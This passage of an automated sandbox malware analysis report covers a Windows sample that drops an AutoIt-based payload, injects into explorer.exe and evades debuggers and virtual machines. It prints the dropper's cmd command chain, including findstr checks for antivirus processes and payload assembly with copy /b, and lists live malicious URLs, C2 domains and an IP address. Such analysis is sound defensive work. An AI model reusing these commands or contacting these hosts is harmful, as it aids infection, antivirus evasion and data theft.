        Source: explorer.exe, 00000011.00000000.2274432480.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
        Source: file.exe, 00000000.00000002.1785552493.0000000000658000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\++)
        Source: explorer.exe, 00000011.00000002.2864144911.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
        Source: explorer.exe, 00000011.00000000.2274432480.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000011.00000000.2277176998.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
        Source: explorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
        Source: explorer.exe, 00000011.00000002.2870173011.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
        Source: file.exe, 00000000.00000002.1785552493.0000000000658000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gSCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: Existence.pif, 0000000A.00000002.2230599399.0000000005263000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2276485731.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2276485731.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Existence.pif, 0000000A.00000002.2230599399.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT[
        Source: explorer.exe, 00000011.00000000.2277176998.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
        Source: explorer.exe, 00000011.00000000.2274432480.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
        Source: Existence.pif, 0000000A.00000002.2230160337.00000000014F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
        Source: explorer.exe, 00000011.00000002.2870173011.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
        Source: explorer.exe, 00000011.00000002.2864144911.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: ssjhrji, 00000013.00000002.2864843617.0000000001198000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-3803
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSystem information queried: ModuleInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSystem information queried: CodeIntegrityInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_10-98105
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007AF4FF BlockInput,10_2_007AF4FF
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0073338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_0073338B
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00735FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00735FC8
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00755058 mov eax, dword ptr fs:[00000030h]10_2_00755058
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_00755058 mov eax, dword ptr fs:[00000030h]16_2_00755058
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00AF5058 mov eax, dword ptr fs:[00000030h]19_2_00AF5058
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007920AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,10_2_007920AA
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00762992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00762992
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00750BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00750BAF
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00750D45 SetUnhandledExceptionFilter,10_2_00750D45
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00750F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00750F91
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_00762992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00762992
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_00750BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00750BAF
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_00750D45 SetUnhandledExceptionFilter,16_2_00750D45
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_00750F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00750F91
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B02992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00B02992
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00AF0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00AF0BAF
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00AF0D45 SetUnhandledExceptionFilter,19_2_00AF0D45
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00AF0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00AF0F91

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\explorer.exeFile created: ssjhrji.17.drJump to dropped file
        Source: C:\Windows\explorer.exeNetwork Connect: 186.10.34.243 80Jump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifThread created: C:\Windows\explorer.exe EIP: 31419F8Jump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifMemory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00791B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00791B4D
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0073338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_0073338B
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0079BBED SendInput,keybd_event,10_2_0079BBED
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0079EC6C mouse_event,10_2_0079EC6C
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Spirit Spirit.cmd & Spirit.cmd & exitJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1151Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "decentrisingadvertisementssuite" Appliance Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Annually + Protective 1151\bJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif 1151\Existence.pif 1151\bJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007914AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_007914AE
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00791FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00791FB0
        Source: file.exe, 00000000.00000003.1610699946.0000000002822000.00000004.00000020.00020000.00000000.sdmp, Existence.pif, 0000000A.00000000.1679411491.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, Existence.pif, 00000010.00000000.2168782443.00000000007F3000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
        Source: Existence.pif, explorer.exe, 00000011.00000000.2274259144.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2276485731.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2273100721.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000011.00000000.2273100721.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000011.00000002.2864929618.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: explorer.exe, 00000011.00000000.2272845685.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2864144911.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
        Source: explorer.exe, 00000011.00000000.2273100721.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000011.00000002.2864929618.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: explorer.exe, 00000011.00000000.2273100721.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000011.00000002.2864929618.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00750A08 cpuid 10_2_00750A08
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0078E5F4 GetLocalTime,10_2_0078E5F4
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0078E652 GetUserNameW,10_2_0078E652
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0076BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,10_2_0076BCD2
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000011.00000002.2865146428.0000000003141000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2288921839.0000000001541000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2288712760.0000000001510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Existence.pifBinary or memory string: WIN_81
        Source: Existence.pifBinary or memory string: WIN_XP
        Source: ssjhrji.17.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
        Source: Existence.pifBinary or memory string: WIN_XPe
        Source: Existence.pifBinary or memory string: WIN_VISTA
        Source: Existence.pifBinary or memory string: WIN_7
        Source: Existence.pifBinary or memory string: WIN_8
        Source: C:\Users\user\AppData\Roaming\ssjhrjiDirectory queried: C:\Users\user\DocumentsJump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000011.00000002.2865146428.0000000003141000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2288921839.0000000001541000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2288712760.0000000001510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007B2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_007B2263
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007B1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,10_2_007B1C61
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B52263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,19_2_00B52263
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B51C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,19_2_00B51C61
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire Infrastructure2
        Valid Accounts
        1
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        Exploitation for Privilege Escalation
        1
        Disable or Modify Tools
        21
        Input Capture
        2
        System Time Discovery
        Remote Services1
        Archive Collected Data
        4
        Ingress Tool Transfer
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Native API
        2
        Valid Accounts
        1
        DLL Side-Loading
        1
        Deobfuscate/Decode Files or Information
        LSASS Memory1
        Account Discovery
        Remote Desktop Protocol1
        Data from Local System
        11
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Exploitation for Client Execution
        Logon Script (Windows)2
        Valid Accounts
        2
        Obfuscated Files or Information
        Security Account Manager13
        File and Directory Discovery
        SMB/Windows Admin Shares21
        Input Capture
        4
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
        Access Token Manipulation
        1
        DLL Side-Loading
        NTDS17
        System Information Discovery
        Distributed Component Object Model3
        Clipboard Data
        115
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script412
        Process Injection
        111
        Masquerading
        LSA Secrets1
        Query Registry
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
        Valid Accounts
        Cached Domain Credentials431
        Security Software Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
        Virtualization/Sandbox Evasion
        DCSync22
        Virtualization/Sandbox Evasion
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
        Access Token Manipulation
        Proc Filesystem4
        Process Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
        Process Injection
        /etc/passwd and /etc/shadow11
        Application Window Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
        Hidden Files and Directories
        Network Sniffing1
        System Owner/User Discovery
        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
        Remote System Discovery
        Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging1
        System Network Configuration Discovery
        Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435516 Sample: file.exe Startdate: 02/05/2024 Architecture: WINDOWS Score: 100 45 rgcVXPIqSMzHmoPyVwzhcGh.rgcVXPIqSMzHmoPyVwzhcGh 2->45 47 cellc.org 2->47 49 2no.co 2->49 67 Snort IDS alert for network traffic 2->67 69 Found malware configuration 2->69 71 Malicious sample detected (through community Yara rule) 2->71 73 6 other signatures 2->73 10 file.exe 59 2->10         started        13 ssjhrji 1 10 2->13         started        signatures3 process4 file5 39 C:\Users\user\AppData\Local\...\Alexandria, PDP-11 10->39 dropped 15 cmd.exe 2 10->15         started        process6 file7 41 C:\Users\user\AppData\Local\...xistence.pif, PE32 15->41 dropped 55 Uses ping.exe to sleep 15->55 57 Drops PE files with a suspicious file extension 15->57 59 Uses ping.exe to check the status of other devices and networks 15->59 19 Existence.pif 12 15->19         started        23 PING.EXE 1 15->23         started        25 cmd.exe 2 15->25         started        27 7 other processes 15->27 signatures8 process9 dnsIp10 51 2no.co 104.21.79.229, 443, 49734 CLOUDFLARENETUS United States 19->51 75 Found API chain indicative of debugger detection 19->75 77 Injects a PE file into a foreign processes 19->77 29 Existence.pif 19->29         started        53 127.0.0.1 unknown unknown 23->53 signatures11 process12 signatures13 79 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 29->79 81 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 29->81 83 Maps a DLL or memory area into another process 29->83 85 2 other signatures 29->85 32 explorer.exe 8 3 29->32 injected process14 dnsIp15 43 cellc.org 186.10.34.243, 49744, 49745, 49746 ENTELCHILESACL Chile 32->43 37 C:\Users\user\AppData\Roaming\ssjhrji, PE32 32->37 dropped 61 System process connects to network (likely due to code injection or exploit) 32->61 63 Benign windows process drops PE files 32->63 65 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->65 file16 signatures17

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        file.exe18%ReversingLabs
        file.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif0%ReversingLabs
        C:\Users\user\AppData\Roaming\ssjhrji0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
        http://purl.oen0%URL Reputationsafe
        http://schemas.micr0%URL Reputationsafe
        https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%URL Reputationsafe
        https://outlook.com_0%URL Reputationsafe
        http://schemas.mi0%URL Reputationsafe
        https://powerpoint.office.comcember0%URL Reputationsafe
        http://ocsps.ssl.com00%URL Reputationsafe
        http://schemas.micro0%URL Reputationsafe
        http://yyyjoidqibgvbs.net/0%Avira URL Cloudsafe
        https://2no.co/16G965u100%Avira URL Cloudmalware
        http://uwgftqaxwugurgs.com/0%Avira URL Cloudsafe
        http://uwgftqaxwugurgs.com/application/x-www-form-urlencodedMozilla/5.00%Avira URL Cloudsafe
        https://2no.co/16G965Z100%Avira URL Cloudmalware
        http://qkoxdyhgicus.org/gs0%Avira URL Cloudsafe
        http://cellc.org/tmp/index.php.ini0%Avira URL Cloudsafe
        http://qkoxdyhgicus.org/0%Avira URL Cloudsafe
        http://dgqkmisxnbbni.net/0%Avira URL Cloudsafe
        http://cellc.org/tmp/index.php0%Avira URL Cloudsafe
